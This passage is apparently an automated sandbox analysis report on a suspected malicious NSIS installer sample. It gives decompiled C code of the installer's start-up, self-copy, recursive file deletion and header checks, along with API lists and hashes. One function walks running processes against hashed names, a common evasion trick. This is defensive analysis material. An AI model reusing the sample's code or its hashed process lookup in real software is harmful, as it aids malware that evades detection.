                                                                                    										_t127 = "C:\\Users\\hardz\\Desktop";
                                                                                    										if(lstrcmpiA(_t116, "C:\\Users\\hardz\\Desktop") != 0) {
                                                                                    											_push(_t116);
                                                                                    											if(_t121 == 0) {
                                                                                    												E004053F2();
                                                                                    											} else {
                                                                                    												E00405375();
                                                                                    											}
                                                                                    											SetCurrentDirectoryA(_t116);
                                                                                    											_t147 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                                                    											if(_t147 == 0) {
                                                                                    												E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t127);
                                                                                    											}
                                                                                    											E00405BC7(0x42f000,  *(_t129 + 0x20));
                                                                                    											 *0x42f400 = 0x41;
                                                                                    											_t128 = 0x1a;
                                                                                    											do {
                                                                                    												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x120)));
                                                                                    												DeleteFileA(0x428c58);
                                                                                    												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                                                                    													_t91 = CopyFileA("C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe", 0x428c58, 1);
                                                                                    													_t149 = _t91;
                                                                                    													if(_t91 != 0) {
                                                                                    														_push(0);
                                                                                    														_push(0x428c58);
                                                                                    														E00405915(_t149);
                                                                                    														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x124)));
                                                                                    														_t95 = E00405427(0x428c58);
                                                                                    														if(_t95 != 0) {
                                                                                    															CloseHandle(_t95);
                                                                                    															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    												 *0x42f400 =  *0x42f400 + 1;
                                                                                    												_t128 = _t128 - 1;
                                                                                    												_t151 = _t128;
                                                                                    											} while (_t128 != 0);
                                                                                    											_push(0);
                                                                                    											_push(_t116);
                                                                                    											E00405915(_t151);
                                                                                    										}
                                                                                    										goto L37;
                                                                                    									}
                                                                                    									 *_t123 = 0;
                                                                                    									_t124 =  &(_t123[4]);
                                                                                    									if(E0040579B(_t140,  &(_t123[4])) == 0) {
                                                                                    										goto L37;
                                                                                    									}
                                                                                    									E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t124);
                                                                                    									E00405BC7(0x434800, _t124);
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                    									goto L36;
                                                                                    								}
                                                                                    								GetWindowsDirectoryA(_t116, 0x3fb);
                                                                                    								lstrcatA(_t116, "\\Temp");
                                                                                    								_t107 = E004030F9(_t135);
                                                                                    								_t136 = _t107;
                                                                                    								if(_t107 == 0) {
                                                                                    									goto L37;
                                                                                    								}
                                                                                    								goto L27;
                                                                                    							} else {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					do {
                                                                                    						L9:
                                                                                    						_t56 =  &(_t56[1]);
                                                                                    						__eflags =  *_t56 - 0x20;
                                                                                    					} while ( *_t56 == 0x20);
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				goto L25;
                                                                                    				L4:
                                                                                    				E00405EE9(_t118); // executed
                                                                                    				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                                                                    				if( *_t118 != 0) {
                                                                                    					goto L4;
                                                                                    				} else {
                                                                                    					E00405F57(0xd);
                                                                                    					_t47 = E00405F57(0xb);
                                                                                    					 *0x42ec24 = _t47;
                                                                                    					__imp__#17();
                                                                                    					__imp__OleInitialize(0); // executed
                                                                                    					 *0x42ecd8 = _t47;
                                                                                    					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
                                                                                    					E00405BC7(0x42e420, "NSIS Error");
                                                                                    					_t51 = GetCommandLineA();
                                                                                    					_t125 = "\"C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe\" ";
                                                                                    					E00405BC7(_t125, _t51);
                                                                                    					 *0x42ec20 = GetModuleHandleA(0);
                                                                                    					_t54 = _t125;
                                                                                    					if("\"C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe\" " == 0x22) {
                                                                                    						 *((char*)(_t129 + 0x14)) = 0x22;
                                                                                    						_t54 =  &M00434001;
                                                                                    					}
                                                                                    					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                                                                    					 *(_t129 + 0x20) = _t56;
                                                                                    					goto L22;
                                                                                    				}
                                                                                    			}
                                                                                    0x0040313b
                                                                                    0x0040313f
                                                                                    0x00403147
                                                                                    0x0040314b
                                                                                    0x00403150
                                                                                    0x00403160
                                                                                    0x00403163
                                                                                    0x0040316a
                                                                                    0x00403171
                                                                                    0x00403171
                                                                                    0x0040316a
                                                                                    0x00403173
                                                                                    0x00403173
                                                                                    0x00403289
                                                                                    0x00403289

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 00403150
                                                                                    • GetVersion.KERNEL32 ref: 00403156
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                    • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                    • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                    • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                    • GetCommandLineA.KERNEL32(0042E420,NSIS Error), ref: 004031D8
                                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000), ref: 004031EB
                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00409168), ref: 00403216
                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                    • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                      • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                      • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                    • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                    • ExitProcess.KERNEL32 ref: 00403386
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 00403399
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 004033A8
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 004033B3
                                                                                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 004033BF
                                                                                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                    • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\Nz7NA3F7z7.exe,00428C58,00000001), ref: 00403439
                                                                                    • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                    • ExitProcess.KERNEL32 ref: 0040353A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                    • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Nz7NA3F7z7.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nz7NA3F7z7.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
                                                                                    • API String ID: 3469842172-2329903170
                                                                                    • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                                                    • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                    • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                                                    • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 98%
                                                                                    			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				struct _WIN32_FIND_DATAA _v332;
                                                                                    				signed int _t37;
                                                                                    				char* _t49;
                                                                                    				signed int _t52;
                                                                                    				signed int _t55;
                                                                                    				signed int _t61;
                                                                                    				signed int _t63;
                                                                                    				void* _t65;
                                                                                    				signed int _t68;
                                                                                    				CHAR* _t70;
                                                                                    				CHAR* _t72;
                                                                                    				char* _t75;
                                                                                    
                                                                                    				_t72 = _a4;
                                                                                    				_t37 = E0040579B(__eflags, _t72);
                                                                                    				_v12 = _t37;
                                                                                    				if((_a8 & 0x00000008) != 0) {
                                                                                    					_t63 = DeleteFileA(_t72); // executed
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t65 =  ~_t63 + 1;
                                                                                    					 *0x42eca8 =  *0x42eca8 + _t65;
                                                                                    					return _t65;
                                                                                    				}
                                                                                    				_t68 = _a8 & 0x00000001;
                                                                                    				__eflags = _t68;
                                                                                    				_v8 = _t68;
                                                                                    				if(_t68 == 0) {
                                                                                    					L5:
                                                                                    					E00405BC7(0x42b0a8, _t72);
                                                                                    					__eflags = _t68;
                                                                                    					if(_t68 == 0) {
                                                                                    						E00405701(_t72);
                                                                                    					} else {
                                                                                    						lstrcatA(0x42b0a8, "\*.*");
                                                                                    					}
                                                                                    					__eflags =  *_t72;
                                                                                    					if( *_t72 != 0) {
                                                                                    						L10:
                                                                                    						lstrcatA(_t72, 0x409010);
                                                                                    						L11:
                                                                                    						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                    						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
                                                                                    						__eflags = _t37 - 0xffffffff;
                                                                                    						_a4 = _t37;
                                                                                    						if(_t37 == 0xffffffff) {
                                                                                    							L29:
                                                                                    							__eflags = _v8;
                                                                                    							if(_v8 != 0) {
                                                                                    								_t31 = _t70 - 1;
                                                                                    								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                    								__eflags =  *_t31;
                                                                                    							}
                                                                                    							goto L31;
                                                                                    						} else {
                                                                                    							goto L12;
                                                                                    						}
                                                                                    						do {
                                                                                    							L12:
                                                                                    							_t75 =  &(_v332.cFileName);
                                                                                    							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
                                                                                    							__eflags =  *_t49;
                                                                                    							if( *_t49 != 0) {
                                                                                    								__eflags = _v332.cAlternateFileName;
                                                                                    								if(_v332.cAlternateFileName != 0) {
                                                                                    									_t75 =  &(_v332.cAlternateFileName);
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *_t75 - 0x2e;
                                                                                    							if( *_t75 != 0x2e) {
                                                                                    								L19:
                                                                                    								E00405BC7(_t70, _t75);
                                                                                    								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                    								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                    									E0040587F(_t72);
                                                                                    									_t52 = DeleteFileA(_t72);
                                                                                    									__eflags = _t52;
                                                                                    									if(_t52 != 0) {
                                                                                    										E00404EB3(0xfffffff2, _t72);
                                                                                    									} else {
                                                                                    										__eflags = _a8 & 0x00000004;
                                                                                    										if((_a8 & 0x00000004) == 0) {
                                                                                    											 *0x42eca8 =  *0x42eca8 + 1;
                                                                                    										} else {
                                                                                    											E00404EB3(0xfffffff1, _t72);
                                                                                    											E00405915(__eflags, _t72, 0);
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									__eflags = (_a8 & 0x00000003) - 3;
                                                                                    									if(__eflags == 0) {
                                                                                    										E004054EC(_t70, __eflags, _t72, _a8);
                                                                                    									}
                                                                                    								}
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                    							__eflags = _t61;
                                                                                    							if(_t61 == 0) {
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							__eflags = _t61 - 0x2e;
                                                                                    							if(_t61 != 0x2e) {
                                                                                    								goto L19;
                                                                                    							}
                                                                                    							__eflags =  *((char*)(_t75 + 2));
                                                                                    							if( *((char*)(_t75 + 2)) == 0) {
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							goto L19;
                                                                                    							L27:
                                                                                    							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                    							__eflags = _t55;
                                                                                    						} while (_t55 != 0);
                                                                                    						_t37 = FindClose(_a4);
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					__eflags =  *0x42b0a8 - 0x5c;
                                                                                    					if( *0x42b0a8 != 0x5c) {
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					__eflags = _t37;
                                                                                    					if(_t37 == 0) {
                                                                                    						L31:
                                                                                    						__eflags = _v8;
                                                                                    						if(_v8 == 0) {
                                                                                    							L39:
                                                                                    							return _t37;
                                                                                    						}
                                                                                    						__eflags = _v12;
                                                                                    						if(_v12 != 0) {
                                                                                    							_t37 = E00405EC2(_t72);
                                                                                    							__eflags = _t37;
                                                                                    							if(_t37 == 0) {
                                                                                    								goto L39;
                                                                                    							}
                                                                                    							E004056BA(_t72);
                                                                                    							E0040587F(_t72);
                                                                                    							_t37 = RemoveDirectoryA(_t72);
                                                                                    							__eflags = _t37;
                                                                                    							if(_t37 != 0) {
                                                                                    								return E00404EB3(0xffffffe5, _t72);
                                                                                    							}
                                                                                    							__eflags = _a8 & 0x00000004;
                                                                                    							if((_a8 & 0x00000004) == 0) {
                                                                                    								goto L33;
                                                                                    							}
                                                                                    							E00404EB3(0xfffffff1, _t72);
                                                                                    							return E00405915(__eflags, _t72, 0);
                                                                                    						}
                                                                                    						L33:
                                                                                    						 *0x42eca8 =  *0x42eca8 + 1;
                                                                                    						return _t37;
                                                                                    					}
                                                                                    					__eflags = _a8 & 0x00000002;
                                                                                    					if((_a8 & 0x00000002) == 0) {
                                                                                    						goto L31;
                                                                                    					}
                                                                                    					goto L5;
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                                                    • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                                                    • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                                                    • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                                                    • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                                                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                                                                    • FindClose.KERNEL32(?), ref: 0040564F
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\Nz7NA3F7z7.exe" , xrefs: 004054EC
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                                                                    • \*.*, xrefs: 0040554E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-2257158756
                                                                                    • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                    • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                    • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                    • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E73794225(void* __eflags, intOrPtr _a4) {
                                                                                    				intOrPtr _v8;
                                                                                    				void* _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v544;                          // PROCESSENTRY32W.szExeFile (offset 0x24 into _v580)
                                                                                    				void* _v580;                         // PROCESSENTRY32W structure, dwSize = 0x22c
                                                                                    				struct tagPROCESSENTRY32W* _t25;
                                                                                    
                                                                                    				_v8 = E737946E6();
                                                                                    				// three lookups keyed by 32-bit constants; the results are not used in this listing
                                                                                    				_v16 = E7379478E(_v8, 0xea31d3b6);
                                                                                    				_v20 = E7379478E(_v8, 0x5c7bf6e9);
                                                                                    				_v24 = E7379478E(_v8, 0x873d1860);
                                                                                    				_v12 = CreateToolhelp32Snapshot(2, 0);     // TH32CS_SNAPPROCESS
                                                                                    				if(_v12 != 0xffffffff) {                    // INVALID_HANDLE_VALUE
                                                                                    					_v580 = 0x22c;                            // sizeof(PROCESSENTRY32W)
                                                                                    					_t25 =  &_v580;
                                                                                    					// walk the process list; return 1 once E737941E1(szExeFile) equals _a4
                                                                                    					if(Process32FirstW(_v12, _t25) != 0) {
                                                                                    						while(E737941E1( &_v544) != _a4) {
                                                                                    							if(Process32NextW(_v12,  &_v580) != 0) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							return 0;                               // end of list, no match
                                                                                    						}
                                                                                    						return 1;                                 // match found (snapshot handle is not closed)
                                                                                    					}
                                                                                    					return 0;
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 7379426A
                                                                                    • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 7379428E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 2353314856-0
                                                                                    • Opcode ID: 3f52e8ac9aa48969a2cf3d14fc8a405bebc7fcdbccb52713b05fb7c6454309ed
                                                                                    • Instruction ID: 87494e6ae7f8d481e3c50c3f765e2f29cf0beb9181f46bd56e067940b67837dc
                                                                                    • Opcode Fuzzy Hash: 3f52e8ac9aa48969a2cf3d14fc8a405bebc7fcdbccb52713b05fb7c6454309ed
                                                                                    • Instruction Fuzzy Hash: B4112A74D0022DBFEB21DFB0ED4ABADBBB8FF04310F1046A5E915E6154E7304A509A59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405EC2(CHAR* _a4) {
                                                                                    				void* _t2;
                                                                                    
                                                                                    				// probe whether the path in _a4 exists; 0x42c0f0 is a static WIN32_FIND_DATAA buffer
                                                                                    				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
                                                                                    				if(_t2 == 0xffffffff) {                  // INVALID_HANDLE_VALUE: not found
                                                                                    					return 0;
                                                                                    				}
                                                                                    				FindClose(_t2);
                                                                                    				return 0x42c0f0;                          // pointer to the filled find data
                                                                                    			}

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                    • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                    • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                    • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E00402C55(void* __eflags, signed int _a4) {
                                                                                    				DWORD* _v8;
                                                                                    				DWORD* _v12;
                                                                                    				void* _v16;
                                                                                    				intOrPtr _v20;                        // first-header field: length of all following data
                                                                                    				long _v24;                            // first-header field: length of header
                                                                                    				intOrPtr _v28;                        // first-header field: "Inst"
                                                                                    				intOrPtr _v32;                        // first-header field: "soft"
                                                                                    				intOrPtr _v36;                        // first-header field: "Null"
                                                                                    				intOrPtr _v40;                        // first-header field: 0xdeadbeef
                                                                                    				signed int _v44;                      // first-header field: flags
                                                                                    				long _t43;
                                                                                    				long _t50;
                                                                                    				void* _t53;
                                                                                    				void* _t57;
                                                                                    				intOrPtr* _t59;
                                                                                    				long _t60;
                                                                                    				long _t70;
                                                                                    				void* _t71;
                                                                                    				signed int _t77;
                                                                                    				intOrPtr _t80;
                                                                                    				long _t82;
                                                                                    				void* _t85;
                                                                                    				signed int _t87;
                                                                                    				void* _t89;
                                                                                    				long _t90;
                                                                                    				char* _t91;                           // missing from the decompiler output: own module path
                                                                                    				char* _t92;                           // missing from the decompiler output: own module directory
                                                                                    				intOrPtr* _t40;                       // missing from the decompiler output: _t94 + 0x44
                                                                                    				long _t93;
                                                                                    				void* _t94;
                                                                                    
                                                                                    				_t82 = 0;
                                                                                    				_v12 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_t43 = GetTickCount();
                                                                                    				_t91 = "C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe";
                                                                                    				 *0x42ec2c = _t43 + 0x3e8;                     // deadline: now + 1000 ms
                                                                                    				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe", 0x400); // own path into a 0x400-byte buffer
                                                                                    				_t89 = E0040589E(_t91, 0x80000000, 3);
                                                                                    				_v16 = _t89;
                                                                                    				 *0x409014 = _t89;
                                                                                    				if(_t89 == 0xffffffff) {
                                                                                    					return "Error launching installer";
                                                                                    				}
                                                                                    				_t92 = "C:\\Users\\hardz\\Desktop";
                                                                                    				E00405BC7("C:\\Users\\hardz\\Desktop", _t91);
                                                                                    				E00405BC7(0x436000, E00405701(_t92));
                                                                                    				_t50 = GetFileSize(_t89, 0);
                                                                                    				 *0x428c50 = _t50;
                                                                                    				_t93 = _t50;
                                                                                    				if(_t50 <= 0) {
                                                                                    					L24:
                                                                                    					E00402BF1(1);
                                                                                    					if( *0x42ec34 == _t82) {
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					if(_v8 == _t82) {
                                                                                    						L28:
                                                                                    						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                    						_t94 = _t53;
                                                                                    						E004030E2( *0x42ec34 + 0x1c);
                                                                                    						_push(_v24);
                                                                                    						_push(_t94);
                                                                                    						_push(_t82);
                                                                                    						_push(0xffffffff); // executed
                                                                                    						_t57 = E00402E8E(); // executed
                                                                                    						if(_t57 == _v24) {
                                                                                    							 *0x42ec30 = _t94;
                                                                                    							 *0x42ec38 =  *_t94;
                                                                                    							if((_v44 & 0x00000001) != 0) {
                                                                                    								 *0x42ec3c =  *0x42ec3c + 1;
                                                                                    							}
                                                                                    							_t40 = _t94 + 0x44; // 0x44
                                                                                    							_t59 = _t40;
                                                                                    							_t85 = 8;
                                                                                    							do {
                                                                                    								_t59 = _t59 - 8;
                                                                                    								 *_t59 =  *_t59 + _t94;
                                                                                    								_t85 = _t85 - 1;
                                                                                    							} while (_t85 != 0);
                                                                                    							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                    							 *(_t94 + 0x3c) = _t60;
                                                                                    							E0040585F(0x42ec40, _t94 + 4, 0x40);
                                                                                    							return 0;
                                                                                    						}
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					E004030E2( *0x414c40);
                                                                                    					if(E004030B0( &_a4, 4) == 0 || _v12 != _a4) {
                                                                                    						goto L29;
                                                                                    					} else {
                                                                                    						goto L28;
                                                                                    					}
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_t90 = _t93;
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t70 = ( ~( *0x42ec34) & 0x00007e00) + 0x200;
                                                                                    						if(_t93 >= _t70) {
                                                                                    							_t90 = _t70;
                                                                                    						}
                                                                                    						_t71 = E004030B0(0x420c50, _t90); // executed
                                                                                    						if(_t71 == 0) {
                                                                                    							E00402BF1(1);
                                                                                    							L29:
                                                                                    							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                    						}
                                                                                    						if( *0x42ec34 != 0) {
                                                                                    							if((_a4 & 0x00000002) == 0) {
                                                                                    								E00402BF1(0);
                                                                                    							}
                                                                                    							goto L20;
                                                                                    						}
                                                                                    						E0040585F( &_v44, 0x420c50, 0x1c);
                                                                                    						_t77 = _v44;
                                                                                    						// NSIS first-header check: flags, 0xdeadbeef, then "Null" "soft" "Inst" as little-endian dwords
                                                                                    						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                                                    							_a4 = _a4 | _t77;
                                                                                    							_t87 =  *0x414c40; // 0x8600
                                                                                    							 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
                                                                                    							_t80 = _v20;
